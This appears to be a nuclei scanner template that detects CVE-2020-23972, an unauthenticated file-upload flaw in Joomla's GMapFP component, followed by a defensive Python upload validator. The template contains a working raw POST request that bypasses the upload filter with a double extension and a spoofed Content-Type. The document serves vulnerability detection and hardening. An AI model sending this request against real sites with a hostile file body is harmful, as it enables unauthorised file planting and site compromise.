nuclei-templates/cves/2020/CVE-2020-23972.yaml


id: CVE-2020-23972

info:
  name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
  author: dwisiswant0
  severity: high
  description: |
    An attacker can access the upload function of the application
    without authenticating and can upload files due to an unrestricted
    file upload issue; the upload filter can be bypassed by changing
    the Content-Type and giving the file a double extension.
  reference:
    - https://www.exploit-db.com/exploits/49129
    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-23972
    cwe-id: CWE-434
  tags: cve,cve2020,joomla

requests:
  - raw:
      - |
        POST /index.php?option={{component}}&controller=editlieux&tmpl=component&task=upload_image HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
        Referer: {{BaseURL}}
        Connection: close

        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="option"

        com_gmapfp
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"
        Content-Type: text/html

        projectdiscovery
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS
        Content-Disposition: form-data; name="no_html"

        no_html
        ------WebKitFormBoundarySHHbUsfCoxlX1bpS--

    # Values substituted for {{component}} in the request path
    payloads:
      component:
        - "com_gmapfp"
        - "comgmapfp"

    # Extract the window.opener callback from the response body
    extractors:
      - type: regex
        part: body
        regex:
          - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
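
The description names two bypass conditions, a mismatched Content-Type and a double extension, and both are things a server-side upload check can reject. The following is an added example, not part of the template or of GMapFP's code: the `ALLOWED` policy and the `upload_findings` name are assumptions, and the sample body is constructed from the file part of the request above.

```python
from email import message_from_bytes
from pathlib import PurePosixPath

# Assumed upload policy (not from the page): extension -> (MIME type, magic prefixes)
ALLOWED = {
    ".gif": ("image/gif", (b"GIF87a", b"GIF89a")),
    ".png": ("image/png", (b"\x89PNG\r\n\x1a\n",)),
    ".jpg": ("image/jpeg", (b"\xff\xd8\xff",)),
    ".jpeg": ("image/jpeg", (b"\xff\xd8\xff",)),
}

def upload_findings(content_type: str, body: bytes) -> list[str]:
    """Return the reasons to reject file parts in a multipart/form-data body."""
    # Prepend the request's Content-Type so the stdlib MIME parser sees the boundary.
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    findings = []
    for part in msg.walk():
        name = part.get_filename()
        if not name:  # ordinary form field (or the multipart container), not a file
            continue
        suffixes = [s.lower() for s in PurePosixPath(name).suffixes]
        rule = ALLOWED.get(suffixes[-1]) if suffixes else None
        if rule is None:
            findings.append(f"{name}: extension not allowed")
            continue
        mime, magics = rule
        if len(suffixes) > 1:  # strict by assumption: any extra suffix is rejected
            findings.append(f"{name}: double extension {''.join(suffixes)}")
        if part.get_content_type() != mime:
            findings.append(f"{name}: declared {part.get_content_type()}, expected {mime}")
        data = part.get_payload(decode=True) or b""
        if not data.startswith(magics):  # check the bytes, not the client's claims
            findings.append(f"{name}: content is not {mime}")
    return findings

# Constructed sample: the file part from the template's request.
B = "----WebKitFormBoundarySHHbUsfCoxlX1bpS"
SAMPLE_CT = f"multipart/form-data; boundary={B}"
SAMPLE_BODY = (
    f"--{B}\r\n"
    'Content-Disposition: form-data; name="image1"; filename="nuclei.html.gif"\r\n'
    "Content-Type: text/html\r\n\r\n"
    "projectdiscovery\r\n"
    f"--{B}--\r\n"
).encode()

if __name__ == "__main__":
    for finding in upload_findings(SAMPLE_CT, SAMPLE_BODY):
        print(finding)
```

Validation like this complements, rather than replaces, requiring authentication on the upload task and storing files under server-generated names.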